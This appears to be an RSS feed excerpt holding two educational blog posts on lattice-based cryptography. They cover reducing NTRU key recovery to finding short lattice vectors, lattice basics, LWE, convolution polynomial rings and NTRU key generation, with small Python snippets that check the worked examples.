&lt;p&gt;In these terms, the multiplication in $R$ can be stated in matrix form. More precisely, let $M_\mathbf{h} \in \mathbb Z^{N\times N}$ be the matrix given by&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
M_h = \left(\begin{array}{cccc}h_0 &amp;amp; h_1 &amp;amp; \cdots &amp;amp; h_{N-1} \newline h_{N-1} &amp;amp; h_0 &amp;amp; \cdots &amp;amp; h_{N-2} \newline \vdots &amp;amp; \vdots &amp;amp; \ddots &amp;amp; \vdots \newline h_1 &amp;amp; h_2 &amp;amp; \cdots &amp;amp; h_0\end{array}\right).&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
Then, given a polynomial $f \in R$ and letting $g = fh$, it is not hard to see that we have the equality of vectors&lt;br &#x2F;&gt;
$$\mathbf{g} = \mathbf{f} \cdot M_{\mathbf h}.$$ Regarding the example above, the reader can verify that modulo 37, we have that&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
(0, 1, 0, -1, -1) =&lt;br &#x2F;&gt;
(1, 1, -1, 0, 1)\cdot \left(\begin{array}{rrrrr}&lt;br &#x2F;&gt;
32 &amp;amp; 12 &amp;amp; 22 &amp;amp; 35 &amp;amp; 28 \newline&lt;br &#x2F;&gt;
28 &amp;amp; 32 &amp;amp; 12 &amp;amp; 22 &amp;amp; 35 \newline&lt;br &#x2F;&gt;
35 &amp;amp; 28 &amp;amp; 32 &amp;amp; 12 &amp;amp; 22 \newline&lt;br &#x2F;&gt;
22 &amp;amp; 35 &amp;amp; 28 &amp;amp; 32 &amp;amp; 12 \newline&lt;br &#x2F;&gt;
12 &amp;amp; 22 &amp;amp; 35 &amp;amp; 28 &amp;amp; 32&lt;br &#x2F;&gt;
\end{array}\right).$$&lt;&#x2F;p&gt;
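&lt;p&gt;This matrix identity can be verified with a few lines of code; the sketch below (variable names are ours) builds the circulant matrix $M_{\mathbf h}$ and checks the product modulo 37:&lt;&#x2F;p&gt;

```python
# Multiplication in R as a vector-by-circulant-matrix product, mod q = 37.
N, q = 5, 37
h = [32, 12, 22, 35, 28]            # h_0 .. h_4
f = [1, 1, -1, 0, 1]                # the ternary polynomial f

# M_h[i][k] = h_{(k-i) mod N}: row i is h cyclically shifted right i places
M = [[h[(k - i) % N] for k in range(N)] for i in range(N)]

g = [sum(f[i] * M[i][k] for i in range(N)) % q for k in range(N)]
print(g)  # [0, 1, 0, 36, 36]  ==  (0, 1, 0, -1, -1) mod 37
```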
&lt;h2 id=&quot;the-ntru-lattice&quot;&gt;The NTRU lattice&lt;&#x2F;h2&gt;
&lt;p&gt;The natural attack involves looking for ternary polynomials $f,g \in R$ such that $fh = g \in R_q$. Equivalently, such that there exists $k \in R$ such that&lt;br &#x2F;&gt;
$$ fh = g + qk \quad \in R.$$&lt;&#x2F;p&gt;
&lt;p&gt;To use the matrix formulation from above, we introduce the block matrix $M_{\mathbf h,q}$ given by&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
M_{\mathbf h,q} = \left(\begin{array}{cc}I_N &amp;amp; M_{\mathbf h} \newline 0 &amp;amp; qI_N \end{array}\right).&lt;br &#x2F;&gt;
$$ Note that its determinant equals $q^N$ and, in particular, is nonzero. This means that its rows form a basis of $\mathbb R ^{2N}$. In particular, they span a (public) lattice, which we will denote by $L_{h,q}$.&lt;&#x2F;p&gt;
&lt;p&gt;Considering block multiplication, we see that the equality above is rewritten as&lt;br &#x2F;&gt;
$$ (\mathbf f,-\mathbf k) \cdot M_{\mathbf h,q} = (\mathbf f,\mathbf g).$$ From here on, we can leave polynomials aside.&lt;&#x2F;p&gt;
&lt;p&gt;Note that the vector on the left-hand side is obtained by linearly combining the rows from $M_{\mathbf h,q}$ with the coefficients of $(\mathbf f,- \mathbf k)$, which are integers. In other words, this is a vector in the lattice $L_{h,q}$.&lt;&#x2F;p&gt;
&lt;p&gt;Since $f$ and $g$ are ternary, the vector on the right-hand side is a small (or &lt;em&gt;short&lt;&#x2F;em&gt;) vector. Thus, breaking NTRU is equivalent to finding short vectors in the lattice $L_{h,q}$ given by the public key.&lt;&#x2F;p&gt;
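&lt;p&gt;For the running example, the cofactor $k$ can be recovered from the integer product $fh$, and the identity $(\mathbf f,-\mathbf k) \cdot M_{\mathbf h,q} = (\mathbf f,\mathbf g)$ can be checked directly. A sketch (all names are ours):&lt;&#x2F;p&gt;

```python
# Check (f, -k) . M_{h,q} = (f, g) over the integers, for the running example.
N, q = 5, 37
h = [32, 12, 22, 35, 28]
f = [1, 1, -1, 0, 1]
g = [0, 1, 0, -1, -1]

# integer cyclic convolution f*h in R (no reduction mod q)
fh = [0] * N
for i in range(N):
    for j in range(N):
        fh[(i + j) % N] += f[i] * h[j]

k = [(fh_i - g_i) // q for fh_i, g_i in zip(fh, g)]   # fh = g + q*k in R

# block matrix M_{h,q} = [[I_N, M_h], [0, q*I_N]], rows of length 2N
Mh = [[h[(c - r) % N] for c in range(N)] for r in range(N)]
top = [[1 if c == r else 0 for c in range(N)] + Mh[r] for r in range(N)]
bot = [[0] * N + [q if c == r else 0 for c in range(N)] for r in range(N)]
M = top + bot

coeffs = f + [-x for x in k]
lattice_vec = [sum(coeffs[r] * M[r][c] for r in range(2 * N)) for c in range(2 * N)]
print(lattice_vec == f + g)  # True: the short vector (f, g) lies in L_{h,q}
```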
&lt;h2 id=&quot;finding-short-vectors-the-rough-way&quot;&gt;Finding short vectors, the rough way&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;lattices-recalling-the-basics&quot;&gt;Lattices: recalling the basics&lt;&#x2F;h3&gt;
&lt;p&gt;Recall that given a basis $v_1 , \dots , v_n$ of $\mathbb R^n$, the lattice $L$ defined by this basis is&lt;br &#x2F;&gt;
$$ L = \{ \sum_{ i = 1 }^n k_i v_i : k_i \in \mathbb Z \}.$$&lt;&#x2F;p&gt;
&lt;p&gt;It is easy to see that if we transform the given basis by a base-change matrix with integral coefficients and determinant 1 or -1 (a &lt;em&gt;unimodular&lt;&#x2F;em&gt; matrix), we obtain a different basis for $L$. Moreover, every other basis for $L$ is obtained in this way.&lt;&#x2F;p&gt;
&lt;p&gt;For example, the lattice in the plane defined by the canonical basis $e_1 = (1,0), e_2 = (0,1)$ can also be defined by the basis&lt;br &#x2F;&gt;
$$ v = (-7226, 23423),\quad w = (379835, -1231231). $$ In fact, $$-1231231 v - 23423 w = e_1, \quad -379835 v - 7226 w = e_2,$$ which shows that $e_1$ and $e_2$ (and hence every integral combination of them) can be written as an integral combination of $v$ and $w$.&lt;&#x2F;p&gt;
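&lt;p&gt;Both claims can be checked by computing the determinant of the basis matrix and solving for the coefficients exactly; a sketch:&lt;&#x2F;p&gt;

```python
from fractions import Fraction

v = (-7226, 23423)
w = (379835, -1231231)

# determinant of the basis matrix with rows v, w
det = v[0] * w[1] - v[1] * w[0]
print(det)  # 1 -> the matrix is unimodular, so v, w generate all of Z^2

# express e1 and e2 as integer combinations c1*v + c2*w by inverting [v; w]
inv = [[Fraction(w[1], det), Fraction(-v[1], det)],
       [Fraction(-w[0], det), Fraction(v[0], det)]]
for e, (c1, c2) in zip([(1, 0), (0, 1)], inv):
    combo = (c1 * v[0] + c2 * w[0], c1 * v[1] + c2 * w[1])
    assert combo == e  # the coefficients are integers since det = 1
```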
&lt;p&gt;As we see, the same lattice can be described by both simple and complicated bases.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-volume&quot;&gt;The volume&lt;&#x2F;h3&gt;
&lt;p&gt;The most important invariant of a lattice $L$ is its &lt;em&gt;volume&lt;&#x2F;em&gt;, which is the volume of the fundamental parallelepiped $\mathcal F$ generated by a basis $\mathcal B$ of $L$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;srRCpaD.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It can be computed as $$vol(L) = |\det(C)|$$ where $C$ is the matrix having the vectors in $\mathcal B$ as columns (the reader interested in understanding why this computes the volume should consider the case $n = 2$). This number is independent of the chosen basis (i.e., it is an &lt;em&gt;invariant&lt;&#x2F;em&gt; of $L$), since changing $\mathcal B$ amounts to multiplying $C$ by a unimodular matrix.&lt;&#x2F;p&gt;
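&lt;p&gt;A small numerical illustration of this invariance (the matrices below are our own toy choices):&lt;&#x2F;p&gt;

```python
# vol(L) = |det C| does not depend on the basis: multiplying by a unimodular
# matrix U (integer entries, det = ±1) leaves |det| unchanged.
C = [[3, 1], [1, 2]]            # a basis of a plane lattice
U = [[2, 1], [1, 1]]            # unimodular: det = 2*1 - 1*1 = 1

def det2(M):
    return M[0][0] * M[1][1] - M[0][1] * M[1][0]

UC = [[sum(U[i][k] * C[k][j] for k in range(2)) for j in range(2)]
      for i in range(2)]
print(abs(det2(C)), abs(det2(UC)))  # 5 5 -> same volume for both bases
```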
&lt;p&gt;The volume is essential for our cryptographic interests since it gives a bound for the size of the shortest vector.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;short-vectors-brute-force&quot;&gt;Short vectors: brute force&lt;&#x2F;h3&gt;
&lt;p&gt;Every lattice $L$ contains the zero vector, which is naturally discarded when discussing short vectors. More precisely, a &lt;em&gt;shortest vector&lt;&#x2F;em&gt; in $L$ is a nonzero vector $v \in L$ such that $\Vert v\Vert$ is minimum. Such a vector exists, though it is not unique: for example, because $\Vert v\Vert = \Vert- v\Vert$.&lt;&#x2F;p&gt;
&lt;p&gt;From a nineteenth-century result due to Hermite, we know that&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The lattice $L$ contains a shortest vector $v$ such that $|v_i| \leq vol(L)^{1&#x2F;n}$ for every $1 \leq i \leq n$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;This gives us a box $B$ where we can, by brute force, perform a search for shortest vectors.&lt;&#x2F;p&gt;
&lt;p&gt;How expensive would this be? Roughly, $|L \cap B|$ should be the number of times $\mathcal F$ fits in $B$. Hence, from the result of Hermite, we get that&lt;br &#x2F;&gt;
$$ |L \cap B| \sim vol(B) &#x2F; vol(L) = ( 2 vol(L)^{ 1&#x2F;n } )^n &#x2F; vol(L) = 2^n,$$ which shows that brute force is impractical for large $n$, independently of $L$. This continues to hold for the slight improvements available for Hermite’s result.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we described how to transform the problem of finding the key in NTRU involving polynomials into a matrix problem. We explained the lattice behind the NTRU public key and how finding the private key can be reduced to finding short vectors in that lattice. We also provided some bounds on how hard it is to find short vectors, in general, using brute force attacks, showing that it is impractical for sufficiently large values of $n$, that is, polynomials of very large degrees. In upcoming posts, we will cover the fundamentals of other lattice schemes, such as CRYSTALS Kyber, and those related to fully homomorphic encryption, as well as more efficient lattice reduction techniques.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>I want to break free from Lattice-based cryptography, but not even a quantum computer can help me</title>
          <pubDate>Tue, 18 Apr 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/i-want-to-break-free-from-lattice-based-cryptography-but-not-even-a-quantum-computer-can-help-me/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/i-want-to-break-free-from-lattice-based-cryptography-but-not-even-a-quantum-computer-can-help-me/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/i-want-to-break-free-from-lattice-based-cryptography-but-not-even-a-quantum-computer-can-help-me/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Public key encryption is a secure way of sending information over the internet. It uses two keys: a public key and a private key. We use the public key to encrypt messages. We can share this key publicly. The private key is kept secret and only known to the owner, who can use it to decrypt messages. This concept was introduced in a groundbreaking paper by Diffie and Hellman in the late 1970s and offered several advantages over previously used methods, including enhanced security, secure key exchange, digital signatures, scalability, and easier key management.&lt;&#x2F;p&gt;
&lt;p&gt;The working principle behind public key cryptography is that some complex mathematical problem (which can be easily verified if we know the solution or some secret information, but it is otherwise computationally expensive) relates the keys. For example, in the RSA cryptosystem, the public key denoted as $e$, and the private key, represented as $d$, are related by the expression $d \times e \equiv 1 (\mod \phi(n))$. This means that $e$ is the multiplicative inverse of $d$ modulo a function called Euler’s totient function evaluated at $n$, denoted as $\phi(n)$. There are efficient algorithms to compute modular inverses. Still, they require knowing the prime factorization of $n$, which is very hard for large numbers and could take longer than our lifespans, even with the fastest supercomputers.&lt;&#x2F;p&gt;
&lt;p&gt;Elliptic curve cryptography is another type of public key cryptography that uses a different mathematical approach. In this system, the secret key, denoted as $sk$, is related to the public key, denoted as $pk$, through a generator of a large subgroup of an elliptic curve, represented as $g$, by the expression $pk = g^{sk}$. We can recover the secret key from the public key if we find the exponent in this expression, known as the discrete logarithm problem. Depending on the properties of the curve and its subgroups, this problem can be tough to solve.&lt;&#x2F;p&gt;
&lt;p&gt;However, there is a potential threat to these public key encryption schemes posed by the advent of quantum computers, which are based on a different technology than conventional computers and can solve specific hard problems much faster. To address this, cryptographers have been working on other encryption schemes that can resist quantum computers, known as post-quantum secure cryptosystems. The NIST (National Institute of Standards and Technology) is standardizing one or more quantum-secure algorithms. Many of these schemes are based on the hardness of specific problems over lattices, leading to lattice-based cryptography.&lt;&#x2F;p&gt;
&lt;p&gt;Lattice-based cryptography is resistant to quantum computers and can also be used to construct fully homomorphic encryption schemes, which have important applications in secure computing and data privacy.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;lattices&quot;&gt;Lattices&lt;&#x2F;h2&gt;
&lt;p&gt;In mathematics, a lattice is a regular arrangement of points in a multi-dimensional space, forming a grid-like structure. Imagine a piece of graph paper where the intersections of the horizontal and vertical lines create a lattice. Lattices can have different shapes, sizes, and dimensions depending on the problem being addressed.&lt;&#x2F;p&gt;
&lt;p&gt;Formally, a lattice can be defined as a set of points generated by linear combinations of a set of basis vectors with integer coefficients. These basis vectors define the directions and spacing of the lattice points. The lattice can span multiple dimensions, with each dimension corresponding to a different basis vector. For example, in two-dimensional space, a lattice can be represented by two basis vectors that define the spacing between the lattice points along the horizontal and vertical directions. Below is the image of a hexagonal lattice spanned by two vectors forming a 120° angle.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;6jcGgy3.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Given a set of linearly independent vectors, $\mathbb{V} = \{ v_1 , v_2 , v_3 , \dots , v_m \}$ in $\mathbb{R}^n$, the lattice generated by $\mathbb{V}$ is given by the set&lt;&#x2F;p&gt;
&lt;p&gt;$$ L = \{ a_1 v_1 + a_2 v_2 + \dots + a_m v_m : a_k \in \mathbb{Z}\}$$&lt;&#x2F;p&gt;
&lt;p&gt;The dimension of $L$ is the number of vectors in a basis for $L$. We can also use other vectors $\mathbb{W} = \{ w_1 , w_2 , \dots , w_m\}$ as a basis for $L$. The basis vectors are related by&lt;br &#x2F;&gt;
$w_1 = a_{11} v_1 + a_{12} v_2 + \dots + a_{1m}v_m$&lt;br &#x2F;&gt;
$w_2 = a_{21} v_1 + a_{22} v_2 + \dots + a_{2m}v_m$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$w_m = a_{m1} v_1 + a_{m2} v_2 + \dots + a_{mm}v_m$&lt;&#x2F;p&gt;
&lt;p&gt;which can be written in matrix form as&lt;br &#x2F;&gt;
$$\mathbf{w} = A \mathbf{v}$$&lt;&#x2F;p&gt;
&lt;p&gt;The matrix $A$ is invertible, and we can also write the relationship between the bases as&lt;br &#x2F;&gt;
$$A^{-1} \mathbf{w} = \mathbf{v}$$&lt;&#x2F;p&gt;
&lt;p&gt;For example, in $\mathbb{R}^3$ we can form the cubic lattice by using three perpendicular vectors, $E = \{ (1,0,0) , (0,1,0) , (0,0,1) \}$; the lattice consists of all triples of integers $(x,y,z)$. We could also select as a basis the vectors $B = \{ (2,1,1), (3,2,1), (1,1,1)\}$. The matrix $A$ contains as rows the vectors from $B$.&lt;&#x2F;p&gt;
&lt;p&gt;Some bases are nicer than others. For example, the basis $E$ has three perpendicular (orthogonal) vectors of length 1. On the other hand, the vectors in basis $B$ are longer and not perpendicular. We will shortly see that a nicer basis allows us to solve some lattice problems easily.&lt;&#x2F;p&gt;
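&lt;p&gt;We can confirm that $B$ generates the same lattice as $E$ by checking that the change-of-basis matrix is unimodular; a sketch:&lt;&#x2F;p&gt;

```python
# The basis B = {(2,1,1), (3,2,1), (1,1,1)} spans the same cubic lattice Z^3
# as E, because the matrix A (rows = vectors of B) has determinant 1.
A = [[2, 1, 1], [3, 2, 1], [1, 1, 1]]

def det3(m):
    # cofactor expansion along the first row
    return (m[0][0] * (m[1][1] * m[2][2] - m[1][2] * m[2][1])
          - m[0][1] * (m[1][0] * m[2][2] - m[1][2] * m[2][0])
          + m[0][2] * (m[1][0] * m[2][1] - m[1][1] * m[2][0]))

print(det3(A))  # 1 -> integer combinations of B reach every point of Z^3
```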
&lt;h2 id=&quot;shortest-vector-problem&quot;&gt;Shortest Vector Problem&lt;&#x2F;h2&gt;
&lt;p&gt;Two important mathematical problems in lattices are the following:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Shortest vector problem (SVP): we want to find a non-zero vector $\mathbf{v}$ in the lattice having the shortest length, $\Vert \mathbf{v} \Vert$.&lt;&#x2F;li&gt;
&lt;li&gt;Closest vector problem (CVP): given a vector $\mathbf{w}$, not necessarily in the lattice, we want to find a lattice vector $\mathbf{v}$ closest to it, that is, we want the vector $\mathbf{w} - \mathbf{v}$ to have minimal length.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;When we have an orthogonal basis (that is, each pair of basis vectors is orthogonal), any lattice vector $\mathbf{u} = a_1 \mathbf{v_1} + \dots + a_m \mathbf{v_m}$ satisfies, by the Pythagorean theorem,&lt;br &#x2F;&gt;
$$\Vert \mathbf{u} \Vert^2 = a_1^2 \Vert \mathbf{v_1} \Vert^2 + a_2^2 \Vert \mathbf{v_2} \Vert^2 + \dots + a_m^2 \Vert \mathbf{v_m} \Vert^2$$&lt;br &#x2F;&gt;
where all $a_k$ are integers. Therefore, the nonzero vectors of minimal length are contained in the set $\{ \pm \mathbf{v_1} , \pm \mathbf{v_2} , \dots , \pm \mathbf{v_m}\}$.&lt;&#x2F;p&gt;
&lt;p&gt;If the basis is not orthogonal but still “nice,” we can use Babai’s algorithm to obtain a “good” approximation to the solution. This strategy fails if the basis vectors are far from orthogonal, that is, nearly parallel to each other.&lt;&#x2F;p&gt;
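&lt;p&gt;A minimal sketch of Babai’s rounding technique (the basis and target below are our own illustrative choices, and the output is only an approximation, not necessarily the closest lattice vector):&lt;&#x2F;p&gt;

```python
from fractions import Fraction

# Babai's rounding: write the target in lattice coordinates,
# then round each coordinate to the nearest integer.
v1, v2 = (2, 1), (1, 3)      # a reasonably "nice" basis
w = (7, 8)                   # target point

det = v1[0] * v2[1] - v1[1] * v2[0]
# exact coordinates c1, c2 with c1*v1 + c2*v2 = w (Cramer's rule)
c1 = Fraction(w[0] * v2[1] - w[1] * v2[0], det)
c2 = Fraction(v1[0] * w[1] - v1[1] * w[0], det)
a1, a2 = round(c1), round(c2)
close = (a1 * v1[0] + a2 * v2[0], a1 * v1[1] + a2 * v2[1])
print(close)  # (8, 9): a nearby lattice point
```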
&lt;h2 id=&quot;ring-learning-with-errors&quot;&gt;Ring Learning with Errors&lt;&#x2F;h2&gt;
&lt;p&gt;The Learning with Errors (LWE) problem is a mathematical problem used in cryptography to secure communication and protect data. It involves finding a hidden pattern in noisy data. Think of it like trying to solve a puzzle where you are given a bunch of equations with some errors, and you need to figure out the correct relationship between the variables despite the errors. In LWE, the equations are represented as numbers modulo a large prime number, and the goal is to find the hidden linear relationship between them despite the noise.&lt;&#x2F;p&gt;
&lt;p&gt;Formally, given pairs $(\mathbf{a}_k , b_k)$ related by some linear function $b_k \approx \mathbf{s}^t \mathbf{a}_k$, the goal is to distinguish these pairs from uniformly sampled random points $(\mathbf{x} , y)$. Each pair $(\mathbf{a}_k , b_k)$ contains a random error $e_k$, and we have to find $\mathbf{s}$ despite these errors.&lt;&#x2F;p&gt;
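&lt;p&gt;A toy illustration of what LWE samples look like (the dimension, modulus, and error bound below are our own illustrative choices, far too small for real security):&lt;&#x2F;p&gt;

```python
import random

# Toy LWE samples: b_k = <s, a_k> + e_k mod q, with small errors e_k.
random.seed(42)
n_dim, q = 4, 97
s = [random.randrange(q) for _ in range(n_dim)]   # the secret vector

samples = []
for _ in range(8):
    a = [random.randrange(q) for _ in range(n_dim)]
    e = random.choice([-2, -1, 0, 1, 2])          # small random error
    b = (sum(si * ai for si, ai in zip(s, a)) + e) % q
    samples.append((a, b))

# Holding s, each b is within the error bound of <s, a>;
# without s, the pairs are hard to tell apart from uniform noise.
for a, b in samples:
    diff = (b - sum(si * ai for si, ai in zip(s, a))) % q
    assert min(diff, q - diff) <= 2
```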
&lt;h2 id=&quot;convolution-polynomial-rings&quot;&gt;Convolution polynomial rings&lt;&#x2F;h2&gt;
&lt;p&gt;Say we are working with the polynomials with coefficients over some ring, such as the integers, $\mathbb{Z}[x]$. The ring of convolution polynomials of degree $n$ is given by the quotient&lt;br &#x2F;&gt;
$$ R = \mathbb{Z}[x] &#x2F; (x^n - 1) $$&lt;&#x2F;p&gt;
&lt;p&gt;This means we have polynomials modulo $x^n - 1$, analogously to how we worked with integers. For integers, we said that $15 \equiv 1 \mod 7$ because it can be written as a multiple of $7$ plus a remainder, that is, $15=2\times 7 + 1$. We could then work with $1$ instead of $15$ and operate with it. For polynomials, $x^5 + x^2 + 1 \equiv x + 2 \mod x^2 - 1$, because&lt;br &#x2F;&gt;
$$ x^5 + x^2 + 1 = (x^2 - 1)(x^3 + x + 1) + (x + 2)$$&lt;&#x2F;p&gt;
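&lt;p&gt;Since $x^2 \equiv 1$ in this quotient, the remainder can also be obtained by folding each exponent $i$ onto $i \bmod 2$; a sketch (the helper name is ours):&lt;&#x2F;p&gt;

```python
# Reduce x^5 + x^2 + 1 mod (x^2 - 1): since x^2 ≡ 1, fold each exponent i
# onto i mod 2. Coefficient lists are ascending in x.
def reduce_mod_xn_minus_1(coeffs, n):
    out = [0] * n
    for i, c in enumerate(coeffs):
        out[i % n] += c
    return out

p = [1, 0, 1, 0, 0, 1]              # x^5 + x^2 + 1
print(reduce_mod_xn_minus_1(p, 2))  # [2, 1], i.e. the remainder x + 2
```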
&lt;p&gt;The exciting property when using $x^n -1$ is that whenever we spot a power $x^n$, we can replace $x^n$ by $1$ (in the case of more complex polynomials, we would have to carry out the division and find the remainder). This also leads to a more straightforward expression for polynomial multiplication. Let’s look at an example first,&lt;br &#x2F;&gt;
$$ (x^2 + 3 x + 5)(2x^2 + 2 x + 7) = p(x) \mod (x^3 - 1)$$&lt;br &#x2F;&gt;
The standard calculation would make us apply distributive property, sum all terms with the same powers and reduce all powers greater than 2:&lt;br &#x2F;&gt;
$$ 2x^4 + 2x^3 + 7x^2 + 6x^3 + 6x^2 + 21x + 10x^2 + 10 x +35 = p(x)$$&lt;br &#x2F;&gt;
Summing,&lt;br &#x2F;&gt;
$$ 2x^4 + 8x^3 + 23 x^2 + 31 x + 35 = p(x)$$&lt;br &#x2F;&gt;
Applying the reduction,&lt;br &#x2F;&gt;
$$p(x) = 23 x^2 + 33 x + 43$$&lt;br &#x2F;&gt;
A more straightforward way would be to realize that the coefficient $p_k$ for term $x^k$ is given by this expression:&lt;br &#x2F;&gt;
$$p_k = \sum_{i+j \equiv k \mod 3} a_i b_j$$&lt;br &#x2F;&gt;
For $x^2$ we have&lt;br &#x2F;&gt;
$$p_2 = a_2 b_0 + a_1 b_1 + a_0 b_2 = 7 + 6 + 10 = 23$$&lt;br &#x2F;&gt;
For $x$ we have&lt;br &#x2F;&gt;
$$p_1 = a_1 b_0 + a_0 b_1 + a_2 b_2 = 21 + 10 + 2 = 33$$&lt;br &#x2F;&gt;
Finally,&lt;br &#x2F;&gt;
$$p_0 = a_0 b_0 + a_2 b_1 + a_1 b_2 = 35 + 2 + 6 = 43$$&lt;&#x2F;p&gt;
&lt;p&gt;In general, we have&lt;br &#x2F;&gt;
$$a(x) \times b(x) = c(x)$$&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
$$ c_k = \sum_{i+j \equiv k \mod n} a_i b_j$$&lt;&#x2F;p&gt;
&lt;p&gt;If you studied the Laplace or Fourier transform, you’ll recognize this as the (cyclic) convolution of the coefficient sequences of $a$ and $b$. If the coefficients of the polynomials can only take the values $-1, 0, 1$, then the previous calculation is even faster.&lt;&#x2F;p&gt;
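&lt;p&gt;The worked product above can be reproduced with the convolution formula directly; a sketch (the helper name is ours):&lt;&#x2F;p&gt;

```python
# Multiply a(x) * b(x) in Z[x]/(x^3 - 1) via the cyclic convolution
# c_k = sum over i+j ≡ k mod 3 of a_i * b_j. Index k holds the x^k coefficient.
def convolve(a, b, n):
    c = [0] * n
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            c[(i + j) % n] += ai * bj
    return c

a = [5, 3, 1]   # x^2 + 3x + 5
b = [7, 2, 2]   # 2x^2 + 2x + 7
print(convolve(a, b, 3))  # [43, 33, 23]  ->  23x^2 + 33x + 43
```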
&lt;p&gt;We can work with polynomials defined over some finite field, $\mathbb{Z}_q$. The convolution polynomial ring is&lt;br &#x2F;&gt;
$$R_q = \mathbb{Z_q}[x]&#x2F;(x^n - 1)$$&lt;&#x2F;p&gt;
&lt;p&gt;In $\mathbb{Z}_q$, we saw that an element $a$ has a multiplicative inverse $b$ (such that $a\times b \equiv 1 \mod q$) if and only if $a$ and $q$ are coprime, that is, $\gcd(a,q) = 1$ (gcd stands for greatest common divisor). An analogous result exists in $R_q$: a polynomial $p(x)$ has a multiplicative inverse $p^{-1}(x)$ (satisfying $p(x)p^{-1}(x) \equiv 1 \mod x^n -1$, with coefficients taken modulo $q$) if and only if $\gcd(p(x) , x^n -1)=1$ in $\mathbb{Z}_q[x]$.&lt;&#x2F;p&gt;
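&lt;p&gt;For very small parameters, we can even find an inverse by brute force; a sketch with $n = 3$ and $q = 5$ (our own toy choice):&lt;&#x2F;p&gt;

```python
from itertools import product

# Brute-force search for a multiplicative inverse in R_q = Z_q[x]/(x^n - 1).
# Tiny illustrative parameters: n = 3, q = 5, p(x) = 1 + x.
n, q = 3, 5
p = [1, 1, 0]   # ascending coefficients: 1 + x

def convolve(a, b):
    # multiplication in Z_q[x]/(x^n - 1): cyclic convolution mod q
    c = [0] * n
    for i in range(n):
        for j in range(n):
            c[(i + j) % n] = (c[(i + j) % n] + a[i] * b[j]) % q
    return c

one = [1] + [0] * (n - 1)
inverse = next(list(cand) for cand in product(range(q), repeat=n)
               if convolve(p, list(cand)) == one)
print(inverse)  # [3, 2, 3]: (1 + x)(3 + 2x + 3x^2) ≡ 1 in Z_5[x]/(x^3 - 1)
```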
&lt;h2 id=&quot;lattices-and-polynomial-rings&quot;&gt;Lattices and polynomial rings&lt;&#x2F;h2&gt;
&lt;p&gt;We can map elements from a polynomial ring into points of a lattice. The simplest way is via the coefficient embedding: we see the $k$-th coefficient, $p_k$ as the $k-th$ coordinate of a vector in $\mathbb{Z}_q^k$. This embedding has the nice property that adding polynomials corresponds to the component-wise addition of lattice points, but multiplication does not have a nice geometrical interpretation. In an upcoming post, we will explain in more detail how to reduce the NTRU key recovery to the shortest vector problem over some lattice.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;ntru&quot;&gt;NTRU&lt;&#x2F;h2&gt;
&lt;p&gt;NTRU (N-th degree Truncated polynomial Ring Units) is a public key encryption scheme that works using three convolution polynomial rings,&lt;br &#x2F;&gt;
$$\mathcal{R} = Z[x]&#x2F;(x^n - 1)$$&lt;br &#x2F;&gt;
$$\mathcal{R_q} = Z_q[x]&#x2F;(x^n - 1)$$&lt;br &#x2F;&gt;
$$\mathcal{R_p} = Z_p[x]&#x2F;(x^n - 1)$$&lt;&#x2F;p&gt;
&lt;p&gt;where $n$ is a prime number and not equal to $q$. The secret key in NTRU is given by a pair of polynomials whose coefficients can only take the values $-1, 0, 1$. These polynomials are called trinary polynomials, and we denote their families by $\mathcal{T}(d_1 , d_2)$, where $d_1$ is the number of coefficients equal to one, and $d_2$ is the number of coefficients equal to $-1$ (given that the polynomial has degree less than $n$, there are $n - d_1 - d_2$ coefficients equal to zero). For example, $x^3 - x^2 + 1$ is a trinary polynomial ($d_1 = 2$, $d_2 = 1$), while $2x^3 + x - 3$ is not. The private key is given by the pair $f(x)$ and $g(x)$, where&lt;br &#x2F;&gt;
$f(x) \in \mathcal{T}(d+1 , d)$&lt;br &#x2F;&gt;
$g(x) \in \mathcal{T}(d , d)$&lt;&#x2F;p&gt;
&lt;p&gt;The polynomial $f(x)$ has $d+1$ coefficients equal to $1$ and $d$ coefficients equal to $-1$ (if it had the same number of $1$s and $-1$s, then $f(1) = 0$, and $f$ would have no multiplicative inverse).&lt;&#x2F;p&gt;
&lt;p&gt;We next calculate $F_q (x) = {f(x)}^{-1}$ in the ring $\mathcal{R_q}$ and $F_p (x) = {f(x)}^{-1}$ in the ring $\mathcal{R_p}$, and obtain the public key as&lt;br &#x2F;&gt;
$h(x) = F_q (x) g(x)$&lt;br &#x2F;&gt;
in $\mathcal{R_q}$ (If the polynomial $f(x)$ has no inverse, we have to choose another one). This is the key we will use to encrypt messages. The decryption key is given by $(f(x) , F_p(x))$.&lt;&#x2F;p&gt;
